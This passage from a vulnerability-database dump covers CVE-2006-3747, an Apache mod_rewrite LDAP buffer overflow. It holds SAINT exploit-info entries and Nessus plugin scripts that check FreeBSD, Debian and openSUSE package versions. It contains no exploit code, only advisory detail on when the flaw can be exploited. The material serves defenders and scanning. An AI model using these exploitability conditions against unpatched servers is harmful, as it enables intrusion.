\n\n\n### Background\n\n[mod_rewrite](<http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html>) is an Apache module which allows rule-based modification of URL requests. \n\n### Problem\n\nAn off-by-one buffer overflow vulnerability in mod_rewrite allows command execution when the `**escape_absolute_uri**` function attempts to separate tokens within an LDAP URL. \n\n### Resolution\n\nUpgrade to [Apache HTTP Server](<http://httpd.apache.org/>) version 1.3.37, 2.0.59, or 2.2.3 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html> \n<http://www.kb.cert.org/vuls/id/395412> \n\n\n### Limitations\n\nExploit works on Apache HTTP Server 2.0.58. The vulnerability is only exploitable when there exists a rule where the user can control the initial part of the rewritten URL. The rule must not contain a forbidden or gone flag [F or G] or the \"noescape\" [NE] flag. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2007-06-22T00:00:00", "published": "2007-06-22T00:00:00", "id": "SAINT:386ECCECD3AA34FA1E84E6D3D2B71C7B", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/apache_rewrite_ldap", "title": "Apache mod_rewrite LDAP URL buffer overflow", "type": "saint", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:48", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "edition": 2, "description": "Added: 06/22/2007 \nCVE: [CVE-2006-3747](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747>) \nBID: [19204](<http://www.securityfocus.com/bid/19204>) \nOSVDB: [27588](<http://www.osvdb.org/27588>) \n\n\n### Background\n\n[mod_rewrite](<http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html>) is an Apache module which allows rule-based modification of URL requests. \n\n### Problem\n\nAn off-by-one buffer overflow vulnerability in mod_rewrite allows command execution when the `**escape_absolute_uri**` function attempts to separate tokens within an LDAP URL. \n\n### Resolution\n\nUpgrade to [Apache HTTP Server](<http://httpd.apache.org/>) version 1.3.37, 2.0.59, or 2.2.3 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html> \n<http://www.kb.cert.org/vuls/id/395412> \n\n\n### Limitations\n\nExploit works on Apache HTTP Server 2.0.58. The vulnerability is only exploitable when there exists a rule where the user can control the initial part of the rewritten URL. The rule must not contain a forbidden or gone flag [F or G] or the \"noescape\" [NE] flag. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2007-06-22T00:00:00", "published": "2007-06-22T00:00:00", "id": "SAINT:35A5AA91DCF68555669689272BFFD3E7", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/apache_rewrite_ldap", "type": "saint", "title": "Apache mod_rewrite LDAP URL buffer overflow", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "description": "Added: 06/22/2007 \nCVE: [CVE-2006-3747](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747>) \nBID: [19204](<http://www.securityfocus.com/bid/19204>) \nOSVDB: [27588](<http://www.osvdb.org/27588>) \n\n\n### Background\n\n[mod_rewrite](<http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html>) is an Apache module which allows rule-based modification of URL requests. \n\n### Problem\n\nAn off-by-one buffer overflow vulnerability in mod_rewrite allows command execution when the `**escape_absolute_uri**` function attempts to separate tokens within an LDAP URL. \n\n### Resolution\n\nUpgrade to [Apache HTTP Server](<http://httpd.apache.org/>) version 1.3.37, 2.0.59, or 2.2.3 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html> \n<http://www.kb.cert.org/vuls/id/395412> \n\n\n### Limitations\n\nExploit works on Apache HTTP Server 2.0.58. The vulnerability is only exploitable when there exists a rule where the user can control the initial part of the rewritten URL. The rule must not contain a forbidden or gone flag [F or G] or the \"noescape\" [NE] flag. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2007-06-22T00:00:00", "published": "2007-06-22T00:00:00", "id": "SAINT:B572402CE6E5C851D7572BF044507A14", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/apache_rewrite_ldap", "type": "saint", "title": "Apache mod_rewrite LDAP URL buffer overflow", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-07T10:50:42", "description": "The Apache Software Foundation and The Apache HTTP Server Project\nreports :\n\nAn off-by-one flaw exists in the Rewrite module, mod_rewrite, as\nshipped with Apache 1.3 since 1.3.28, 2.0 since 2.0.46, and 2.2 since\n2.2.0.\n\nDepending on the manner in which Apache HTTP Server was compiled, this\nsoftware defect may result in a vulnerability which, in combination\nwith certain types of Rewrite rules in the web server configuration\nfiles, could be triggered remotely. For vulnerable builds, the nature\nof the vulnerability can be denial of service (crashing of web server\nprocesses) or potentially allow arbitrary code execution. This issue\nhas been rated as having important security impact by the Apache HTTP\nServer Security Team.\n\nThis flaw does not affect a default installation of Apache HTTP\nServer. Users who do not use, or have not enabled, the Rewrite module\nmod_rewrite are not affected by this issue. This issue only affects\ninstallations using a Rewrite rule with the following characteristics\n:\n\n- The RewriteRule allows the attacker to control the initial part of\nthe rewritten URL (for example if the substitution URL starts with $1)\n\n- The RewriteRule flags do NOT include any of the following flags:\nForbidden (F), Gone (G), or NoEscape (NE).\n\nPlease note that ability to exploit this issue is dependent on the\nstack layout for a particular compiled version of mod_rewrite. If the\ncompiler used to compile Apache HTTP Server has added padding to the\nstack immediately after the buffer being overwritten, it will not be\npossible to exploit this issue, and Apache HTTP Server will continue\noperating normally.\n\nThe Apache HTTP Server project thanks Mark Dowd of McAfee Avert Labs\nfor the responsible reporting of this vulnerability.", "edition": 25, "published": "2006-07-29T00:00:00", "title": "FreeBSD : apache -- mod_rewrite buffer overflow vulnerability (dc8c08c7-1e7c-11db-88cf-000c6ec775d9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2006-07-29T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_deflate", "p-cpe:/a:freebsd:freebsd:ru-apache", "p-cpe:/a:freebsd:freebsd:apache+mod_perl", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_deflate+ipv6", "p-cpe:/a:freebsd:freebsd:apache_fp", "p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_accel+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:apache+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_accel", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel+mod_deflate+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_deflate", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_deflate+ipv6", "p-cpe:/a:freebsd:freebsd:apache+ssl", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel", "p-cpe:/a:freebsd:freebsd:apache", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel+mod_deflate"], "id": "FREEBSD_PKG_DC8C08C71E7C11DB88CF000C6EC775D9.NASL", "href": "https://www.tenable.com/plugins/nessus/22118", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22118);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_xref(name:\"CERT\", value:\"395412\");\n\n script_name(english:\"FreeBSD : apache -- mod_rewrite buffer overflow vulnerability (dc8c08c7-1e7c-11db-88cf-000c6ec775d9)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache Software Foundation and The Apache HTTP Server Project\nreports :\n\nAn off-by-one flaw exists in the Rewrite module, mod_rewrite, as\nshipped with Apache 1.3 since 1.3.28, 2.0 since 2.0.46, and 2.2 since\n2.2.0.\n\nDepending on the manner in which Apache HTTP Server was compiled, this\nsoftware defect may result in a vulnerability which, in combination\nwith certain types of Rewrite rules in the web server configuration\nfiles, could be triggered remotely. For vulnerable builds, the nature\nof the vulnerability can be denial of service (crashing of web server\nprocesses) or potentially allow arbitrary code execution. This issue\nhas been rated as having important security impact by the Apache HTTP\nServer Security Team.\n\nThis flaw does not affect a default installation of Apache HTTP\nServer. Users who do not use, or have not enabled, the Rewrite module\nmod_rewrite are not affected by this issue. This issue only affects\ninstallations using a Rewrite rule with the following characteristics\n:\n\n- The RewriteRule allows the attacker to control the initial part of\nthe rewritten URL (for example if the substitution URL starts with $1)\n\n- The RewriteRule flags do NOT include any of the following flags:\nForbidden (F), Gone (G), or NoEscape (NE).\n\nPlease note that ability to exploit this issue is dependent on the\nstack layout for a particular compiled version of mod_rewrite. If the\ncompiler used to compile Apache HTTP Server has added padding to the\nstack immediately after the buffer being overwritten, it will not be\npossible to exploit this issue, and Apache HTTP Server will continue\noperating normally.\n\nThe Apache HTTP Server project thanks Mark Dowd of McAfee Avert Labs\nfor the responsible reporting of this vulnerability.\"\n );\n # http://marc.theaimsgroup.com/?l=apache-httpd-announce&m=115409818602955\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=apache-httpd-announce&m=115409818602955\"\n );\n # https://vuxml.freebsd.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3cac6d85\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel+mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_accel+mod_deflate+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_deflate+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_accel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_accel+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+mod_snmp+mod_deflate+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache_fp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache>=1.3.28<1.3.36_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache>=2.0.46<2.0.58_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache>=2.2.0<2.2.2_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_perl>=1.3.28<1.3.36_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ipv6>=1.3.28<1.3.37\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache_fp>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache>=1.3.28<1.3.37+30.23\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache+mod_ssl>=1.3.28<1.3.34.1.57_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ssl>=1.3.28<1.3.34.1.57_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_accel>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_accel+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_accel+mod_deflate>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_accel+mod_deflate+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_deflate>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_deflate+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_snmp>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_snmp+mod_accel>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_snmp+mod_accel+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_snmp+mod_deflate>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_snmp+mod_deflate+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6>=1.3.28<1.3.36+2.8.27_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:44:40", "description": "Mark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitrary code.", "edition": 26, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1131-1 : apache - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:apache"], "id": "DEBIAN_DSA-1131.NASL", "href": "https://www.tenable.com/plugins/nessus/22673", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1131. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22673);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_xref(name:\"CERT\", value:\"395412\");\n script_xref(name:\"DSA\", value:\"1131\");\n\n script_name(english:\"Debian DSA-1131-1 : apache - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=380231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1131\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache package.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.3.33-6sarge2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"apache\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-common\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-dbg\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-dev\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-doc\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-perl\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-ssl\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-utils\", reference:\"1.3.33-6sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libapache-mod-perl\", reference:\"1.29.0.3-6sarge2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:43:08", "description": "This update fixes the following security problem in the Apache\nwebserver :\n\nmod_rewrite: Fix an off-by-one security problem in the ldap scheme\nhandling. For some RewriteRules this could lead to a pointer being\nwritten out of bounds. (CVE-2006-3747)", "edition": 24, "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : apache2 (apache2-1905)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2007-10-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-prefork", "cpe:/o:novell:opensuse:10.1", "p-cpe:/a:novell:opensuse:apache2"], "id": "SUSE_APACHE2-1905.NASL", "href": "https://www.tenable.com/plugins/nessus/27145", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-1905.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27145);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-3747\");\n\n script_name(english:\"openSUSE 10 Security Update : apache2 (apache2-1905)\");\n script_summary(english:\"Check for the apache2-1905 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security problem in the Apache\nwebserver :\n\nmod_rewrite: Fix an off-by-one security problem in the ldap scheme\nhandling. For some RewriteRules this could lead to a pointer being\nwritten out of bounds. (CVE-2006-3747)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"apache2-2.2.0-21.7\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"apache2-prefork-2.2.0-21.7\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"apache2-worker-2.2.0-21.7\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n 